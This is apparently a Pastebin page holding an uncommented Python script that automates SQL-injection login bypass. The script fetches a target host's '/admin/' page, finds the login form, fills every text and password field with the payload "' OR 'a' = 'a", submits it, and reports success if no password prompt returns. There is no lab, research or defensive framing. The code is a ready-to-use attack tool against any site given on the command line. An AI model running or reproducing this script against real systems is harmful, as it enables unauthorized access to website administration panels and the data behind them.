API tools faq
paste
Advertisement
Guest User

Untitled

a guest
Feb 13th, 2016
59
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 3.28 KB | None | 0 0
raw download clone embed print report
  1. #!/usr/bin/python3
  2.  
  3. import requests
  4. from bs4 import BeautifulSoup
  5. import sys
  6.  
  7. PSWD = "' OR 'a' = 'a"
  8. #PSWD = '1'
  9. def format_host(host):
  10. host = host.strip()
  11. ind = host.find('://')
  12. if ind != -1:
  13. host = host[ind + 3:]
  14.  
  15. slash_ind = host.find('/')
  16. if slash_ind != -1:
  17. host = host[:slash_ind]
  18. return host
  19.  
  20. def create_headers(host):
  21. if host[0:7] == 'http://':
  22. host = host[7:]
  23. if host[0:8] == 'https://':
  24. host = host[8:]
  25. headers = {'Accept':'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8', 'Accept-Encoding':'gzip, deflate', 'Accept-Language':'en-US,en;q=0.8,ka;q=0.6', 'Cache-Control':'max-age=0', 'Connection':'keep-alive', 'Content-Type':'application/x-www-form-urlencoded', 'User-Agent':"""Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.130 Safari/537.36""", 'Upgrade-Insecure-Requests': '1'}
  26. return headers
  27.  
  28. def get_form(host):
  29. url = host + '/admin/'
  30. s = requests.Session()
  31. resp = s.get(url, headers = create_headers(host))
  32. # print(resp.content)
  33. soap = BeautifulSoup(resp.content)
  34. forms = soap.find_all('form');
  35. filtered = []
  36. for f in forms:
  37. if len(forms) == 1:
  38. break
  39. attr = f.attrs.get('method')
  40. if attr != 'post' and attr != 'POST':
  41. continue
  42. filtered.append(f)
  43.  
  44. form = max(forms, key=len)
  45. return form
  46.  
  47. def get_action(form):
  48. attr = form.attrs.get('action')
  49. if not attr:
  50. print('get action')
  51. print('unknown')
  52. exit(0)
  53. return attr
  54.  
  55. def gen_user_data(form):
  56. inputs = form.find_all('input')
  57. res = {}
  58. for inp in inputs:
  59. name = inp.attrs.get('name')
  60. if not name:
  61. continue
  62. val = inp.attrs.get('value')
  63. res[name] = val
  64. if val and len(val) > 0:
  65. continue
  66. tp = inp.attrs.get('type')
  67. if tp and len(tp) > 0 and tp != 'text' and tp != 'password':
  68. continue
  69. res[name] = PSWD
  70. return res
  71.  
  72.  
  73. def run(host):
  74. if host[len(host) - 1] == '/':
  75. host = host[:-1]
  76. if host.find('http://') == -1 and host.find('https://') == -1:
  77. host = 'http://' + host
  78. form = get_form(host);
  79. action = get_action(form)
  80. # print(form)
  81. gen_user_data(form)
  82. # exit()
  83. url = host + '/admin/' + action
  84. if action[0:7] == 'http://' or action[0:8] == 'https://':
  85. url = action
  86.  
  87. s = requests.Session()
  88. login_url = url
  89. userdata = gen_user_data(form)
  90. headers = create_headers(host)
  91. res = s.post(login_url, data=userdata, headers=headers)
  92. if res.status_code >= 400:
  93. print('failure')
  94. exit()
  95. # print(res.content)
  96. # print(res.content)
  97. # print(res.cookies)
  98. # print(dir(res))
  99. # print(res.url)
  100. # print(res.status_code)
  101. content = res.content.decode('latin')
  102. print(res.url)
  103. print(content)
  104. if content.find('type="password"') != -1 or content.find("type='password'") != -1:
  105. print('failure')
  106. else:
  107. print('success')
  108.  
  109. if __name__ == '__main__':
  110. if len(sys.argv) < 2:
  111. print('Usage: %s host' % sys.argv[0])
  112. exit(0)
  113. host = sys.argv[1]
  114. run(host)
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement
Public Pastes
Advertisement
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!